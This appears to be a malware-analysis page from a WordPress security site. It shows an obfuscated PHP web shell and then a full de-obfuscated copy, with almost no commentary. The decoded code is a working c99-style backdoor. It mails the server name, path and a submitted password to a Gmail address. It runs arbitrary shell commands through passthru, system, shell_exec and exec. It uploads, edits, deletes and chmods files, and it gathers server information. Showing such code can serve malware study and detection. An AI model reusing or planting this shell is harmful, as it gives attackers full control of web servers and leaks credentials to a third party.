.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][79](c99(232)) .c99(233) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][80]($O_29) .c99(234) .o__9($O_29) .c99(235) .$O_29 .c99(236) .$O_29 .c99(237) .$O_31[c99(238)] .c99(239) .$O_32[c99(240)] .c99(241) .$O_29 .c99(242) .$O_29 .c99(243) .$O_29 .c99(244) .$O_29 .c99(245);}}print c99(246);}function o__0(){$O_33=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][81](c99(247));if(!$O_33){$O_24=c99(248);}else{$O_24=c99(249);}return($O_24);}function o__1(){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][82](c99(250))){$O_20=c99(251);}else{$O_20=c99(252);}return($O_20);}function o__2(){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][83](c99(253))){$O_24=c99(254);}else{$O_24=c99(255);}return($O_24);}function o__3(){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][84](c99(256))){$O_34=c99(257);}else{$O_34=c99(258);}return($O_34);}function o__4(){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][85](c99(259))){$O_35=c99(260);}else{$O_35=c99(261);}return($O_35);}function o__5(){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][86](c99(262))){$O_35=c99(263);}else{$O_35=c99(264);}return($O_35);}function o__6($O_36){if($O_36>=round(0+214748364.8+214748364.8+214748364.8+214748364.8+214748364.8)){$O_36=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][87]($O_36/round(0+1073741824)*round(0+100))/round(0+20+20+20+20+20) .c99(265);}elseif($O_36>=round(0+1048576)){$O_36=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][88]($O_36/round(0+1048576)*round(0+100))/round(0+25+25+25+25) .c99(266);}elseif($O_36>=round(0+256+256+256+256)){$O_36=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][89]($O_36/round(0+512+512)*round(0+25+25+25+25))/round(0+33.333333333333+33.333333333333+33.333333333333) .c99(267);}else{$O_36=$O_36 .c99(268);}return($O_36);}function o__7($O_23){if($O_23== c99(269)){$O_23=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][90]();}$O_34=c99(270);$O_16=c99(271);$O_37=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][91](DIRECTORY_SEPARATOR,$O_23);for($O_30=round(0);$O_30<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][92]($O_37);$O_30++){$O_38=$O_37[$O_30];$O_34.=$O_37[$O_30] .DIRECTORY_SEPARATOR;$O_16 .= c99(272) .$O_34 .c99(273) .$O_38 .c99(274) .DIRECTORY_SEPARATOR;}return($O_16);}function o__8($O_18){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][93]($O_18)){$O_20=c99(275);}if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][94]($O_18)&& ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][95]($O_18)){$O_20=c99(276) .$O_10 .c99(277);}if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][96]($O_18)&&!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][97]($O_18)){$O_20=c99(278);}return($O_20);}function o__9($O_18){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][98]($O_18)){return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][99](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][100](c99(279),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][101]($O_18)),-round(0+4));}else{return c99(280);}}function o__10(){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][102](c99(281))){$O_35=c99(282);}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][103](c99(283))){$O_35=c99(284);}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][104](c99(285))){$O_35=c99(286);}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][105](c99(287))){$O_35=c99(288);}if(!isset($O_35)){$O_35=c99(289);}return($O_35);}function o__11($O_35,$O_20){if($O_35== c99(290)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][106]($O_20);}elseif($O_35== c99(291)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][107]($O_20);}elseif($O_35== c99(292)){print ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][108]($O_20);}elseif($O_35== c99(293)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][109]($O_20,$O_39);foreach($O_39 as $O_24){print $O_24 .c99(294);}}else{print c99(295);}}function o__12(){print c99(296) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][110](__FILE__) .c99(297);}function o__13(){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][111](c99(298) .${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x39\x39"][112](__FILE__));}print $O_13; ?>

Decoded(de-Obfuscated) php code

<?php

/****/
@null;
/********/
/*******/
/********/
/****/
NULL;
/********/
/*******/
/********/
/****/
@blank;
/********/
/*******/
/********/
/** PASSWORD domain name **/
$GLOBALS["c99"] = array("session_start", "error_reporting", "set_time_limit", "array_key_exists", "mail", "setcookie", "date", "time", "date", "basename", "php_uname", "get_current_user", "getmyuid", "getmygid", "ini_get", "getcwd", "realpath", "realpath", "phpversion", "disk_total_space", "disk_free_space", "chdir", "realpath", "fopen", "fwrite", "fclose", "realpath", "file_exists", "file", "htmlspecialchars", "realpath", "realpath", "phpinfo", "setcookie", "time", "chdir", "mkdir", "rename", "rmdir", "unlink", "chmod", "realpath", "basename", "move_uploaded_file", "realpath", "realpath", "realpath", "realpath", "realpath", "realpath", "opendir", "readdir", "is_dir", "asort", "asort", "function_exists", "function_exists", "posix_getpwuid", "fileowner", "posix_getgrgid", "filegroup", "realpath", "realpath", "realpath", "realpath", "realpath", "realpath", "realpath", "function_exists", "function_exists", "posix_getpwuid", "fileowner", "posix_getgrgid", "filegroup", "realpath", "realpath", "realpath", "realpath", "realpath", "realpath", "realpath", "ini_get", "extension_loaded", "function_exists", "function_exists", "function_exists", "function_exists", "round", "round", "round", "getcwd", "explode", "count", "is_writable", "is_writable", "is_readable", "is_writable", "is_readable", "file_exists", "substr", "sprintf", "fileperms", "function_exists", "function_exists", "function_exists", "function_exists", "passthru", "system", "shell_exec", "exec", "basename", "header", "basename");
function c99($i)
{
    $a = array("watching", 'SERVER_NAME', 'PHP_SELF', "\n", 'pass', "inboxnotificationow@gmail.com", 'Ding Dong', 'HTTP_HOST', 'PHPSESSID', 'pass', 'pass', "Ymd", "Ymd", "SERVER_SOFTWARE", ' uid:', ' gid:', 'safe_mode', '<font color:lime>ON</font>', '<font color=red>OFF</font>', '#202020', 'lime', '<html><head><title>b1ng0</title><style>body {background:', ';color:', ';font-size:9pt;font-family:sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:lime;}h1#nm{text-shadow:0px 0px 5px black;color:lime;}a {color:', ';text-decoration:none;font-family:sans serif;}a:hover {color:lime;}hr {background:', ';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:', ';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:', ';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:', ';border-radius:10px;border:1px solid ', ';color:', ';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:', ';box-shadow:0px 0px 1px ', ';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid ', ';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:', ';color:', ';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1>', '<center><p id="menu"><span id="menuB"> <a href="', '">Home</a> | <a href="?x=cmd&d="', '.', '">Command</a> | <a href="?x=php&d="', '.', '">PHP</a> | <a href="javascript:get_inf();">Info</a> | <a href="?x=q">Logout</a> </span></p></center>', '</body></html>', '<center><p id="inf">||| <b><i><u>Software:</u></i></b> ', '  |||  <b><i><u>Uname:</u></i></b> ', ' |||</br>||| <b><i><u>User:</u></i></b> ', ' ||| <b><i><u>Safe Mode:</u></i></b> ', ' |||</p></center><hr>', 'PHP Version', 'Curl', 'OpenBase Dir', 'MySQL', 'MsSQL', 'PostgreSQL', 'Oracle', 'Total Space', '/', 'Used Space', '/', 'Your IP', 'REMOTE_ADDR', 'Server IP', 'SERVER_ADDR', '<table id="moreI">', '<td>', '</td><td> > </td><td> ', '</td><tr>', '<td colspan=3 align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></table>', 'd', 'd', 'x', '<p id="bck"><a href="?d=', '.', '">BACK</a></p>', 'x', 'c', 'edit_form', 'f', 'w', '<p id="nn">Error Opening File</p>', 'edit_form', '<p id="nn">Couldn\'t Save File</p>', '<center><p>Editing ', 'f', ' (', 'd', 'f', ') .</p></br></br><form action="?x=c&d=', '.', '&f=', 'f', '" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">', 'f', 'f', '</textarea></br></br><input type="submit" value="Save" id="sv"></form></center>', 'cmd', '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=', '.', '" method="POST"><input type="text" value="" name="cmd" id="lt">  <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">', 'cmd', 'cmd', '</textarea></center>', 'php', '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="', '.', '" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">', '</textarea></center>', 'phpinf', 'q', '', 'd', 'd', 'ndir', 'd', 'ndir', 'new', 'new', 'old', 'd', 'deld', 'deld', 'delf', 'delf', 'ch', 'ch', 'df', 'upfile', 'name', '.', 'upfile', 'name', 'upfile', 'tmp_name', '<p align="center" id="cp">', '', '</p>', '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=', '.', '" method="GET">Create Dir: <input type="hidden" name="d" value="', '.', '" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="', '.', '" method="GET">Create File: <input type="hidden" value="', '.', '" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=', '.', '" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=', '.', '" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>', '</br>', '<table width="75%" align="center" id="ft" ><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td><tr id="fn">', '.', 'posix_getpwuid', 'posix_getgrgid', 'name', '???', 'name', '???', '<td id="fc"><span id="n', '"><a href="?d=', '">', '</a></span><span id="r', '" style="display:none;"><form action="?d=', '.', '" method="POST"><input type="hidden" value="', '.', '" name="d"> <input type="text" value="', '" id="lt" name="new"><input type="hidden" value="', '" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n', '\',\'r', '\');"></form></span><span id="d', '" style="display:none;"><form action="?d=', '.', '" method="GET">Are you Sure?<input type="hidden" value="', '" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n', '\',\'d', '\')"></form></span></td><td id="fc" align="center"><span id="h', '"><a href="javascript:xyn(\'c', '\',\'h', '\');"><font color="', '">', '</font></a></span><span id="c', '" style="display:none;"><form action="?d=', '.', '" method="GET"><input type="hidden" value="', '" name="df"><input type="text" value="', '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h', '\',\'c', '\');"></form></span></td><td id="fc" align="center">', 'name', ' : ', 'name', '</td>', '<td id="fc"></td><tr id="fn">', '<td id="fc" align="center"><a href="javascript:xyn(\'r', '\',\'n', '\')">[R]</a> <a href="javascript:xyn(\'d', '\',\'n', '\')">[D]</a></td><tr id="fn">', 'posix_getpwuid', 'posix_getgrgid', 'name', '???', 'name', '???', '<td id="fc"><span id="n', '"><a href="?x=c&d=', '.', '&f=', '">', '</a></span><span id="r', '" style="display:none;"><form action="?d=', '.', '" method="POST"><input type="hidden" value="', '.', '" name="d"> <input type="text" id="lt" value="', '" name="new"><input type="hidden" value="', '" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n', '\',\'r', '\');"></form></span><span id="d', '" style="display:none;"><form action="?d=', '.', '" method="GET">Are you Sure?<input type="hidden" value="', '" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n', '\',\'d', '\')"></form></span></td><td id="fc" align="center"><span id="h', '"><a href="javascript:xyn(\'c', '\',\'h', '\');"><font color="', '">', '</font></a></span><span id="c', '" style="display:none;"><form action="?d=', '.', '" method="GET"><input type="hidden" value="', '" name="df"><input type="text" value="', '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h', '\',\'c', '\');"></form></span></td><td id="fc" align="center">', 'name', ' : ', 'name', '</td><td id="fc" align="center"><a href="javascript:xyn(\'r', '\',\'n', '\')">[R]</a> <a href="javascript:xyn(\'d', '\',\'n', '\');">[D]</a></td><tr id="fn">', '</table></br></br></br>', 'open_basedir', '<font color=red>OFF</font>', '<font color=lime>ON</font>', 'curl', '<font color=lime>ON</font>', '<font color=red>OFF</font>', 'ocilogon', '<font color=lime>ON</font>', '<font color=red>OFF</font>', 'pg_connect', '<font color=lime>ON</font>', '<font color=red>OFF</font>', 'mysql_connect', '<font color=lime>ON</font>', '<font color=red>OFF</font>', 'mssql_connect', '<font color=lime>ON</font>', '<font color=red>OFF</font>', 'GB', 'MB', 'KB', 'B', '', '', '', '<a href="?d=', '">', '</a>', 'lime', '', '', 'red', '%o', '???', 'passthru', 'passthru', 'exec', 'exec', 'shell_exec', 'shell_exec', 'system', 'system', 'Disabled', 'passthru', 'system', 'shell_exec', 'exec', '</br>', 'dafuq?', '<table border=0 width=100% height=100% align=center style="background:#202020;color:lime;"><td valign="middle"><center><form action="', '" method="POST">Password <input type="password" name="pass" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" name="watching" value=">>" style="background:#202020;color:lime;border-radius:10px;border:1px solid silver;"></form></center></td></table>', "Location: ");
    return $a[$i];
}
session_start();
error_reporting(round(0));
set_time_limit(round(0));
if (array_key_exists(c99(0), $_POST)) {
    $O_0 = $_SERVER[c99(1)] . $_SERVER[c99(2)] . c99(3) . $_POST[c99(4)];
    @mail(c99(5), c99(6), $O_0);
}
$O_1 = $_SERVER[c99(7)];
$O_2 = c99(8);
if (isset($_REQUEST[c99(9)])) {
    if ($_REQUEST[c99(10)] == $O_1) {
        $GLOBALS["c99"][5]($O_2, $GLOBALS["c99"][6](c99(11)), $GLOBALS["c99"][7]() + round(3600));
    }
    o__13();
}
if (!empty($O_1) && !isset($_COOKIE[$O_2]) or $_COOKIE[$O_2] != $GLOBALS["c99"][8](c99(12))) {
    o__12();
    die;
}
$O_3 = $GLOBALS["c99"][9]("/var/www/html/input.php");
$O_4 = $_SERVER[c99(13)];
$O_5 = $GLOBALS["c99"][10]();
$O_6 = $GLOBALS["c99"][11]() . c99(14) . $GLOBALS["c99"][12]() . c99(15) . $GLOBALS["c99"][13]();
$O_7 = $GLOBALS["c99"][14](c99(16));
$O_7 = $O_7 ? c99(17) : c99(18);
$O_8 = $GLOBALS["c99"][15]();
$O_9 = c99(19);
$O_10 = c99(20);
$O_11 = c99(21) . $O_9 . c99(22) . $O_10 . c99(23) . $O_10 . c99(24) . $O_10 . c99(25) . $O_9 . c99(26) . $O_9 . c99(27) . $O_9 . c99(28) . $O_10 . c99(29) . $O_10 . c99(30) . $O_10 . c99(31) . $O_10 . c99(32) . $O_10 . c99(33) . $O_9 . c99(34) . $O_10 . c99(35);
$O_12 = c99(36) . $O_3 . c99(37) . $GLOBALS["c99"][16](c99(38)) . c99(39) . $GLOBALS["c99"][17](c99(40)) . c99(41);
$O_13 = c99(42);
$O_14 = c99(43) . $O_4 . c99(44) . $O_5 . c99(45) . $O_6 . c99(46) . $O_7 . c99(47);
print $O_11;
print $O_12;
print $O_14;
$O_15 = array(c99(48) => $GLOBALS["c99"][18](), c99(49) => o__1(), c99(50) => o__0(), c99(51) => o__4(), c99(52) => o__5(), c99(53) => o__3(), c99(54) => o__2(), c99(55) => o__6($GLOBALS["c99"][19](c99(56))), c99(57) => o__6($GLOBALS["c99"][20](c99(58))), c99(59) => $_SERVER[c99(60)], c99(61) => $_SERVER[c99(62)]);
print c99(63);
foreach ($O_15 as $O_16 => $O_17) {
    print c99(64) . $O_16 . c99(65) . $O_17 . c99(66);
}
print c99(67);
if (isset($_GET[c99(68)])) {
    $GLOBALS["c99"][21]($_GET[c99(69)]);
}
if (isset($_REQUEST[c99(70)])) {
    print c99(71) . $GLOBALS["c99"][22](c99(72)) . c99(73);
    switch ($_REQUEST[c99(74)]) {
        case c99(75):
            if (isset($_POST[c99(76)])) {
                $O_18 = $_GET[c99(77)];
                $O_19 = $GLOBALS["c99"][23]($O_18, c99(78)) or print c99(79);
                $GLOBALS["c99"][24]($O_19, $_POST[c99(80)]) or print c99(81);
                $GLOBALS["c99"][25]($O_19);
            }
            print c99(82) . $_GET[c99(83)] . c99(84) . o__9($_GET[c99(85)] . $_GET[c99(86)]) . c99(87) . $GLOBALS["c99"][26](c99(88)) . c99(89) . $_GET[c99(90)] . c99(91);
            if ($GLOBALS["c99"][27]($_GET[c99(92)])) {
                $O_20 = $GLOBALS["c99"][28]($_GET[c99(93)]);
                foreach ($O_20 as $O_21) {
                    print $GLOBALS["c99"][29]($O_21);
                }
            }
            print c99(94);
            break;
        case c99(95):
            print c99(96) . $GLOBALS["c99"][30](c99(97)) . c99(98);
            if (isset($_POST[c99(99)])) {
                $O_22 = $_POST[c99(100)];
                o__11(o__10(), $O_22);
            }
            print c99(101);
            break;
        case c99(102):
            print c99(103) . $GLOBALS["c99"][31](c99(104)) . c99(105);
            print c99(106);
            break;
        case c99(107):
            $GLOBALS["c99"][32]();
            break;
        case c99(108):
            $GLOBALS["c99"][33]($O_2, c99(109), $GLOBALS["c99"][34]() - round(3600));
            o__13();
            break;
    }
} else {
    if (isset($_GET[c99(110)])) {
        $GLOBALS["c99"][35]($_GET[c99(111)]);
    }
    if (isset($_GET[c99(112)])) {
        $O_23 = $_GET[c99(113)];
        $O_16 = $_GET[c99(114)];
        $GLOBALS["c99"][36]($O_23 . DIRECTORY_SEPARATOR . $O_16);
    }
    if (isset($_POST[c99(115)])) {
        $O_16 = $_POST[c99(116)];
        $O_24 = $_POST[c99(117)];
        $O_23 = $_POST[c99(118)];
        $GLOBALS["c99"][37]($O_23 . DIRECTORY_SEPARATOR . $O_24, $O_23 . DIRECTORY_SEPARATOR . $O_16);
    }
    if (isset($_GET[c99(119)])) {
        $O_23 = $_GET[c99(120)];
        $GLOBALS["c99"][38]($O_23);
    }
    if (isset($_GET[c99(121)])) {
        $O_23 = $_GET[c99(122)];
        $GLOBALS["c99"][39]($O_23);
    }
    if (isset($_GET[c99(123)])) {
        $O_25 = $_GET[c99(124)];
        $O_23 = $_GET[c99(125)];
        $GLOBALS["c99"][40]($O_23, $O_25);
    }
    if (isset($_FILES[c99(126)][c99(127)])) {
        $O_23 = $GLOBALS["c99"][41](c99(128)) . DIRECTORY_SEPARATOR . $GLOBALS["c99"][42]($_FILES[c99(129)][c99(130)]);
        $GLOBALS["c99"][43]($_FILES[c99(131)][c99(132)], $O_23);
    }
    print c99(133) . o__7(c99(134)) . c99(135);
    print c99(136) . $GLOBALS["c99"][44](c99(137)) . c99(138) . $GLOBALS["c99"][45](c99(139)) . c99(140) . $GLOBALS["c99"][46](c99(141)) . c99(142) . $GLOBALS["c99"][47](c99(143)) . c99(144) . $GLOBALS["c99"][48](c99(145)) . c99(146) . $GLOBALS["c99"][49](c99(147)) . c99(148);
    print c99(149);
    $O_26 = array();
    $O_27 = array();
    print c99(150);
    if ($O_28 = $GLOBALS["c99"][50](c99(151))) {
        while (false !== ($O_29 = $GLOBALS["c99"][51]($O_28))) {
            if ($GLOBALS["c99"][52]($O_29)) {
                $O_27[] .= $O_29;
            } else {
                $O_26[] .= $O_29;
            }
        }
        $GLOBALS["c99"][53]($O_26);
        $GLOBALS["c99"][54]($O_27);
        $O_30 = round(0);
        foreach ($O_27 as $O_29) {
            if ($GLOBALS["c99"][55](c99(152)) && $GLOBALS["c99"][56](c99(153))) {
                $O_31 = $GLOBALS["c99"][57]($GLOBALS["c99"][58]($O_29));
                $O_32 = $GLOBALS["c99"][59]($GLOBALS["c99"][60]($O_29));
            } else {
                $O_31[c99(154)] = c99(155);
                $O_32[c99(156)] = c99(157);
            }
            print c99(158) . $O_29 . c99(159) . $GLOBALS["c99"][61]($O_29) . c99(160) . $O_29 . c99(161) . $O_29 . c99(162) . $GLOBALS["c99"][62](c99(163)) . c99(164) . $GLOBALS["c99"][63](c99(165)) . c99(166) . $O_29 . c99(167) . $O_29 . c99(168) . $O_29 . c99(169) . $O_29 . c99(170) . $O_29 . c99(171) . $GLOBALS["c99"][64](c99(172)) . c99(173) . $GLOBALS["c99"][65]($O_29) . c99(174) . $O_29 . c99(175) . $O_29 . c99(176) . $O_29 . c99(177) . $O_29 . c99(178) . $O_29 . c99(179) . o__8($O_29) . c99(180) . o__9($O_29) . c99(181) . $O_29 . c99(182) . $GLOBALS["c99"][66](c99(183)) . c99(184) . $GLOBALS["c99"][67]($O_29) . c99(185) . o__9($O_29) . c99(186) . $O_29 . c99(187) . $O_29 . c99(188) . $O_31[c99(189)] . c99(190) . $O_32[c99(191)] . c99(192);
            if ($O_30 == round(0) or $O_30 == round(1.0)) {
                print c99(193);
            } else {
                print c99(194) . $O_29 . c99(195) . $O_29 . c99(196) . $O_29 . c99(197) . $O_29 . c99(198);
            }
            $O_30++;
        }
        foreach ($O_26 as $O_29) {
            if ($GLOBALS["c99"][68](c99(199)) && $GLOBALS["c99"][69](c99(200))) {
                $O_31 = $GLOBALS["c99"][70]($GLOBALS["c99"][71]($O_29));
                $O_32 = $GLOBALS["c99"][72]($GLOBALS["c99"][73]($O_29));
            } else {
                $O_31[c99(201)] = c99(202);
                $O_32[c99(203)] = c99(204);
            }
            print c99(205) . $O_29 . c99(206) . $GLOBALS["c99"][74](c99(207)) . c99(208) . $O_29 . c99(209) . $O_29 . c99(210) . $O_29 . c99(211) . $GLOBALS["c99"][75](c99(212)) . c99(213) . $GLOBALS["c99"][76](c99(214)) . c99(215) . $O_29 . c99(216) . $O_29 . c99(217) . $O_29 . c99(218) . $O_29 . c99(219) . $O_29 . c99(220) . $GLOBALS["c99"][77](c99(221)) . c99(222) . $GLOBALS["c99"][78]($O_29) . c99(223) . $O_29 . c99(224) . $O_29 . c99(225) . $O_29 . c99(226) . $O_29 . c99(227) . $O_29 . c99(228) . o__8($O_29) . c99(229) . o__9($O_29) . c99(230) . $O_29 . c99(231) . $GLOBALS["c99"][79](c99(232)) . c99(233) . $GLOBALS["c99"][80]($O_29) . c99(234) . o__9($O_29) . c99(235) . $O_29 . c99(236) . $O_29 . c99(237) . $O_31[c99(238)] . c99(239) . $O_32[c99(240)] . c99(241) . $O_29 . c99(242) . $O_29 . c99(243) . $O_29 . c99(244) . $O_29 . c99(245);
        }
    }
    print c99(246);
}
function o__0()
{
    $O_33 = $GLOBALS["c99"][81](c99(247));
    if (!$O_33) {
        $O_24 = c99(248);
    } else {
        $O_24 = c99(249);
    }
    return $O_24;
}
function o__1()
{
    if ($GLOBALS["c99"][82](c99(250))) {
        $O_20 = c99(251);
    } else {
        $O_20 = c99(252);
    }
    return $O_20;
}
function o__2()
{
    if ($GLOBALS["c99"][83](c99(253))) {
        $O_24 = c99(254);
    } else {
        $O_24 = c99(255);
    }
    return $O_24;
}
function o__3()
{
    if ($GLOBALS["c99"][84](c99(256))) {
        $O_34 = c99(257);
    } else {
        $O_34 = c99(258);
    }
    return $O_34;
}
function o__4()
{
    if ($GLOBALS["c99"][85](c99(259))) {
        $O_35 = c99(260);
    } else {
        $O_35 = c99(261);
    }
    return $O_35;
}
function o__5()
{
    if ($GLOBALS["c99"][86](c99(262))) {
        $O_35 = c99(263);
    } else {
        $O_35 = c99(264);
    }
    return $O_35;
}
function o__6($O_36)
{
    if ($O_36 >= round(1073741824.0)) {
        $O_36 = $GLOBALS["c99"][87]($O_36 / round(1073741824) * round(100)) / round(100) . c99(265);
    } elseif ($O_36 >= round(1048576)) {
        $O_36 = $GLOBALS["c99"][88]($O_36 / round(1048576) * round(100)) / round(100) . c99(266);
    } elseif ($O_36 >= round(1024)) {
        $O_36 = $GLOBALS["c99"][89]($O_36 / round(1024) * round(100)) / round(99.99999999999901) . c99(267);
    } else {
        $O_36 .= c99(268);
    }
    return $O_36;
}
function o__7($O_23)
{
    if ($O_23 == c99(269)) {
        $O_23 = $GLOBALS["c99"][90]();
    }
    $O_34 = c99(270);
    $O_16 = c99(271);
    $O_37 = $GLOBALS["c99"][91](DIRECTORY_SEPARATOR, $O_23);
    for ($O_30 = round(0); $O_30 < $GLOBALS["c99"][92]($O_37); $O_30++) {
        $O_38 = $O_37[$O_30];
        $O_34 .= $O_37[$O_30] . DIRECTORY_SEPARATOR;
        $O_16 .= c99(272) . $O_34 . c99(273) . $O_38 . c99(274) . DIRECTORY_SEPARATOR;
    }
    return $O_16;
}
function o__8($O_18)
{
    if ($GLOBALS["c99"][93]($O_18)) {
        $O_20 = c99(275);
    }
    if (!$GLOBALS["c99"][94]($O_18) && $GLOBALS["c99"][95]($O_18)) {
        $O_20 = c99(276) . $O_10 . c99(277);
    }
    if (!$GLOBALS["c99"][96]($O_18) && !$GLOBALS["c99"][97]($O_18)) {
        $O_20 = c99(278);
    }
    return $O_20;
}
function o__9($O_18)
{
    if ($GLOBALS["c99"][98]($O_18)) {
        return $GLOBALS["c99"][99]($GLOBALS["c99"][100](c99(279), $GLOBALS["c99"][101]($O_18)), -round(4));
    } else {
        return c99(280);
    }
}
function o__10()
{
    if ($GLOBALS["c99"][102](c99(281))) {
        $O_35 = c99(282);
    }
    if ($GLOBALS["c99"][103](c99(283))) {
        $O_35 = c99(284);
    }
    if ($GLOBALS["c99"][104](c99(285))) {
        $O_35 = c99(286);
    }
    if ($GLOBALS["c99"][105](c99(287))) {
        $O_35 = c99(288);
    }
    if (!isset($O_35)) {
        $O_35 = c99(289);
    }
    return $O_35;
}
function o__11($O_35, $O_20)
{
    if ($O_35 == c99(290)) {
        $GLOBALS["c99"][106]($O_20);
    } elseif ($O_35 == c99(291)) {
        $GLOBALS["c99"][107]($O_20);
    } elseif ($O_35 == c99(292)) {
        print $GLOBALS["c99"][108]($O_20);
    } elseif ($O_35 == c99(293)) {
        $GLOBALS["c99"][109]($O_20, $O_39);
        foreach ($O_39 as $O_24) {
            print $O_24 . c99(294);
        }
    } else {
        print c99(295);
    }
}
function o__12()
{
    print c99(296) . $GLOBALS["c99"][110]("/var/www/html/input.php") . c99(297);
}
function o__13()
{
    $GLOBALS["c99"][111](c99(298) . $GLOBALS["c99"][112]("/var/www/html/input.php"));
}
print $O_13;


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.